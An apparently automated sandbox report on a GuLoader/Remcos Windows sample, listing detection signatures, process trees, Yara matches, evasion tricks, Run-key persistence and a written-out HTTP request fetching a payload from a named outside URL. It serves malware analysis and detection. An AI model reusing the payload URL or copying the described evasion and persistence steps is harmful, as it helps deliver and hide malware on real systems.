Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Variant.Razy.845229.27038.1852

Overview

General Information

Sample Name:	SecuriteInfo.com.Variant.Razy.845229.27038.1852 (renamed file extension from 1852 to exe)
Analysis ID:	356590
MD5:	869eae0220a293dcabf4051dd323bbd8
SHA1:	395e7683548c8a25c4963e3e3c56b04b76dbf0b7
SHA256:	496fa2a5a6abbc22d6a4c63e31847156d61c240d8e3a793e1b4de46e09827b52
Tags:	GuLoader
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Contains functionality to hide a thread from the debugger

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

SecuriteInfo.com.Variant.Razy.845229.27038.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe' MD5: 869EAE0220A293DCABF4051DD323BBD8)

SecuriteInfo.com.Variant.Razy.845229.27038.exe (PID: 6440 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe' MD5: 869EAE0220A293DCABF4051DD323BBD8)

wscript.exe (PID: 6260 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 4272 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

win.exe (PID: 4720 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: 869EAE0220A293DCABF4051DD323BBD8)

win.exe (PID: 1636 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 869EAE0220A293DCABF4051DD323BBD8)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000013.00000003.820991756.000000000094C000.00000004.00000001.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x11c7c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Process Memory Space: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 6440	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 6440	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: mtspsmjeli.sch.id	Virustotal: Detection: 12%			Perma Link
Source: http://mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin	Virustotal: Detection: 13%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\win.exe	Virustotal: Detection: 35%			Perma Link
Source: C:\Users\user\AppData\Roaming\win.exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe	Virustotal: Detection: 35%			Perma Link
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe	ReversingLabs: Detection: 39%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\win.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Source: Joe Sandbox View

IP Address: 103.150.60.242 103.150.60.242

Source: Joe Sandbox View

ASN Name: PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID

Source: global traffic

HTTP traffic detected: GET /cl/Jice_remcos%202_tfkxJbdn252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mtspsmjeli.sch.idCache-Control: no-cache

Source: global traffic

HTTP traffic detected: GET /cl/Jice_remcos%202_tfkxJbdn252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mtspsmjeli.sch.idCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: mtspsmjeli.sch.id

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp

String found in binary or memory: http://mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000013.00000003.820991756.000000000094C000.00000004.00000001.sdmp, type: MEMORY

Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_0056688B NtProtectVirtualMemory,	19_2_0056688B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_005604B6 EnumWindows,NtSetInformationThread,	19_2_005604B6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00565209 NtSetInformationThread,	19_2_00565209
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_0056506B NtSetInformationThread,	19_2_0056506B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_0056057F NtSetInformationThread,	19_2_0056057F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_005605B2 NtSetInformationThread,	19_2_005605B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00563635 NtSetInformationThread,LdrInitializeThunk,	19_2_00563635
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00560629 NtSetInformationThread,	19_2_00560629
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_0056069F NtSetInformationThread,	19_2_0056069F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00561AA2 NtSetInformationThread,	19_2_00561AA2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00560F41 NtProtectVirtualMemory,	19_2_00560F41
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00560F23 NtProtectVirtualMemory,	19_2_00560F23

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00405454	1_2_00405454
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00405872	1_2_00405872
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00402C01	1_2_00402C01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00405814	1_2_00405814
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00405429	1_2_00405429
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054C1	1_2_004054C1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054C3	1_2_004054C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054C5	1_2_004054C5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054C7	1_2_004054C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054C9	1_2_004054C9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004058CB	1_2_004058CB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054E0	1_2_004054E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004058F7	1_2_004058F7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00405488	1_2_00405488
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040589C	1_2_0040589C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054AC	1_2_004054AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054B3	1_2_004054B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054B5	1_2_004054B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054B7	1_2_004054B7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054B9	1_2_004054B9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054BB	1_2_004054BB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004054BD	1_2_004054BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00405954	1_2_00405954
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040556C	1_2_0040556C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040550A	1_2_0040550A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040513D	1_2_0040513D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040553D	1_2_0040553D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004049E3	1_2_004049E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004055EA	1_2_004055EA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00404DA2	1_2_00404DA2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040525A	1_2_0040525A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00405A06	1_2_00405A06
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040561E	1_2_0040561E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040522C	1_2_0040522C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004056DE	1_2_004056DE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00405682	1_2_00405682
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004052AB	1_2_004052AB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00404B4D	1_2_00404B4D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00405750	1_2_00405750
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040536C	1_2_0040536C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040576D	1_2_0040576D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040530B	1_2_0040530B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00405337	1_2_00405337
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004057C0	1_2_004057C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004057EF	1_2_004057EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004053FB	1_2_004053FB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_00404BFE	1_2_00404BFE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040539A	1_2_0040539A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040579A	1_2_0040579A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004043B6	1_2_004043B6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00565853	19_2_00565853
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00561C9A	19_2_00561C9A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_005656D9	19_2_005656D9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00561B01	19_2_00561B01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00564FCA	19_2_00564FCA

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: win.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCOLLUMELLIACEOUSFR.exe vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000001.00000002.803089059.0000000002130000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000000.801506120.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCOLLUMELLIACEOUSFR.exe vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.828115877.000000001E290000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.828115877.000000001E290000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.824158146.0000000000936000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.824158146.0000000000936000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.827975681.000000001E180000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.827894653.000000001DEB0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe	Binary or memory string: OriginalFilenameCOLLUMELLIACEOUSFR.exe vs SecuriteInfo.com.Variant.Razy.845229.27038.exe

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000013.00000003.820991756.000000000094C000.00000004.00000001.sdmp, type: MEMORY

Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/3@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

File created: C:\Users\user\AppData\Roaming\win.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Mutant created: \Sessions\1\BaseNamedObjects\Remcos-E2OTZW
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_01

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

File created: C:\Users\user\AppData\Local\Temp\~DFE447D3F5160C9423.TMP

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe	Virustotal: Detection: 35%
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe	ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe'
Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 6440, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 6440, type: MEMORY

Source: win.exe.19.dr	Static PE information: real checksum: 0x25c49 should be: 0x22c7a
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe	Static PE information: real checksum: 0x25c49 should be: 0x22c7a

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_0040B0A6 push ds; retf	1_2_0040B140
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 1_2_004059D2 push ss; iretd	1_2_004059D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_005642B4 push ebp; iretd	19_2_005642D9

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

File created: C:\Users\user\AppData\Roaming\win.exe

Jump to dropped file

Boot Survival:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
